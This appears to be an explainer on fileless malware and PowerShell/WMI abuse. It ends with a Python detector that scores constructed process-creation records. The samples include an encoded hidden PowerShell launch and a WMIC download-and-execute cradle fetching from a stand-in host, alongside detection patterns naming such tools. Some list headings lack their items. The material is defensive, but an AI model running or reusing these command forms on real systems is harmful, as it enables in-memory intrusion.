Fileless malware is malicious software that uses legitimate applications already installed on a computer to infect it. It does not rely on files of its own and leaves little footprint on disk, since it is memory-based rather than file-based. Fileless malware does not require code to be installed, but an attacker still needs to gain access to the environment in order to abuse the native tools already present in the user’s operating system. This technique of using native tools to carry out an attack is known as “living off the land.”
Common characteristics of a fileless malware attack include:
Well known fileless malware attacks include:
Fileless malware attacks exploit vulnerabilities in software already installed on a computer to infiltrate it, take control, and carry out the attack. Nothing needs to be installed or downloaded. A fileless attack may be triggered by a user-initiated action, such as clicking an advertisement that redirects to a page loading Flash, and from there it uses other applications on the device.
Once inside the system, specifically in the computer’s RAM, the malware injects malicious code into native Windows tools such as PowerShell and Windows Management Instrumentation (WMI). These tools are targeted because they carry out system tasks across multiple endpoints.
This type of malware exists only in the computer’s RAM, so nothing is written to the hard drive. This gives the attacker a smaller window of opportunity, since a system reboot clears memory and ends the attack, but it also makes the malware harder to detect because there are no stored files for defensive security software to scan.
Fileless malware attacks are difficult to detect, but not impossible: they do leave traces of evidence behind, including artifacts of the compromise in the device’s system memory. Some antivirus software provides analytics that can detect when an application is executed alongside PowerShell. To minimize risk, consider the following approaches:
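As an added illustration of that kind of analytic (example code written for this page, not from any antivirus product), the script below scores constructed Sysmon-style process-creation records for living-off-the-land traits: a document reader or browser spawning PowerShell or WMIC, hidden windows, encoded or download-and-invoke command lines, and WMI-driven process creation. The record format, the indicator lists and the alert threshold are assumptions made for the example.

```python
import re

# Sysmon Event ID 1 style process-creation records, constructed for this
# example (not real telemetry); fields are separated by "|".
SAMPLE_EVENTS = [
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|ParentImage=C:\\Program Files\\Microsoft Office\\WINWORD.EXE|"
    "CommandLine=powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4A",
    "Image=C:\\Windows\\System32\\wbem\\WMIC.exe|ParentImage=C:\\Windows\\explorer.exe|"
    "CommandLine=wmic process call create \"powershell -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')\"",
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|ParentImage=C:\\Windows\\System32\\cmd.exe|"
    "CommandLine=powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "Image=C:\\Windows\\notepad.exe|ParentImage=C:\\Windows\\explorer.exe|CommandLine=notepad.exe notes.txt",
]

# Native tools that living-off-the-land attacks commonly abuse, and parent
# processes (document readers, browsers) that should rarely spawn them.
LOLBINS = {"powershell.exe", "pwsh.exe", "wmic.exe", "mshta.exe", "rundll32.exe"}
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "chrome.exe", "msedge.exe"}
# Command-line traits of in-memory execution: hidden window, encoded payload,
# download-and-invoke cradle, policy bypass, WMI-driven process creation.
CMD_PATTERNS = {
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(nc|ncodedcommand|c)?\s+[A-Za-z0-9+/=]{8,}", re.I),
    "download_cradle": re.compile(r"DownloadString|DownloadFile|IEX|Invoke-Expression", re.I),
    "bypass_policy": re.compile(r"-ex(ecutionpolicy)?\s+bypass", re.I),
    "wmi_process_create": re.compile(r"process\s+call\s+create", re.I),
}

def parse_event(line):
    """Split a 'Key=Value|Key=Value' record into a dict."""
    return dict(field.split("=", 1) for field in line.split("|"))

def score_event(event):
    """Return (score, reasons) for one process-creation event."""
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    reasons = []
    if image in LOLBINS and parent in SUSPICIOUS_PARENTS:
        reasons.append(f"{parent} spawned {image}")
    reasons += [n for n, p in CMD_PATTERNS.items() if p.search(event.get("CommandLine", ""))]
    return len(reasons), reasons

def find_lolbin_abuse(lines, threshold=2):
    """Return (image, score, reasons) for events meeting the alert threshold."""
    alerts = []
    for line in lines:
        event = parse_event(line)
        score, reasons = score_event(event)
        if score >= threshold:
            alerts.append((event["Image"].rsplit("\\", 1)[-1], score, reasons))
    return alerts
```

Running `find_lolbin_abuse(SAMPLE_EVENTS)` flags the Word-spawned hidden encoded PowerShell and the WMI download cradle, while the administrator's scripted backup (one indicator) and the notepad launch stay below the threshold.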